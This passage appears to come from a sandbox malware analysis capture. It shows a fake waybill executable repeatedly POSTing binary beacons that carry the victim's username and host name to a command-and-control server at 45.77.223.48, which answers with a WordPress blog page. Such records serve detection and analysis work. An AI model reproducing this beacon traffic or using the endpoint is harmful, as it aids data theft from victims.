Apr 25, 2024 09:42:44.769531012 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:42:44.769593000 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:42:44.769607067 CEST	761	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 25, 2024 09:42:44.769619942 CEST	1289	IN	Data Raw: 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f Data Ascii: <style id='wp-block-social-links-inline-css'>.wp-block-social-links{background:none;box-sizing:border-box;margin-left:0;padding-left:0;padding-right:0;text-indent:0}.wp-block-social-links .wp-social-link a,.wp-block-social-links .wp-social-li

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49786	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:45.849787951 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:45.976818085 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:46.794424057 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:45 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:46.794595957 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:46.794606924 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:46.803699970 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:46.804141045 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:46.804174900 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:46.804351091 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:46.804529905 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:42:46.804586887 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:42:46.805231094 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49787	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:47.218743086 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:47.348155022 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:48.176254034 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:47 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:48.176371098 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:48.177015066 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:48.185930967 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:48.185944080 CEST	166	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 Data Ascii: <title>Natural biz blog</title><link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:48.186106920 CEST	1289	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
Apr 25, 2024 09:42:48.186201096 CEST	1289	IN	Data Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef
Apr 25, 2024 09:42:48.186224937 CEST	913	IN	Data Raw: 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 Data Ascii: String()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(funct
Apr 25, 2024 09:42:48.186350107 CEST	1289	IN	Data Raw: 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f Data Ascii: <style id='wp-block-social-links-inline-css'>.wp-block-social-links{background:none;box-sizing:border-box;margin-left:0;padding-left:0;padding-right:0;text-indent:0}.wp-block-social-links .wp-social-link a,.wp-block-social-links .wp-social-li
Apr 25, 2024 09:42:48.186423063 CEST	1289	IN	Data Raw: 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e Data Ascii: lock-social-links .wp-block-social-link.wp-social-link{display:inline-block;margin:0;padding:0}.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor,.wp-block-social-links .wp-block-social-link.wp-social-link

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49788	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:48.461123943 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:48.592617989 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:49.394450903 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:48 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:49.394601107 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:49.394612074 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:49.402648926 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:49.403395891 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:49.403462887 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:49.403629065 CEST	1289	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
Apr 25, 2024 09:42:49.403682947 CEST	1289	IN	Data Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef
Apr 25, 2024 09:42:49.403737068 CEST	1289	IN	Data Raw: 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 Data Ascii: String()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(funct
Apr 25, 2024 09:42:49.403791904 CEST	1289	IN	Data Raw: 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 73 76 67 7b 68 65 69 67 68 74 3a 31 65 6d 3b 77 69 64 74 68 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 Data Ascii: al-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-socia

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49789	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:49.681958914 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:49.811392069 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:50.652350903 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:49 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:50.652472973 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:50.652546883 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:50.661850929 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:50.662633896 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:50.662764072 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:50.662924051 CEST	1289	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
Apr 25, 2024 09:42:50.662957907 CEST	1289	IN	Data Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef
Apr 25, 2024 09:42:50.663157940 CEST	1289	IN	Data Raw: 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 Data Ascii: String()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(funct
Apr 25, 2024 09:42:50.663171053 CEST	1289	IN	Data Raw: 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 73 76 67 7b 68 65 69 67 68 74 3a 31 65 6d 3b 77 69 64 74 68 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 Data Ascii: al-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-socia

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49791	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:50.920365095 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
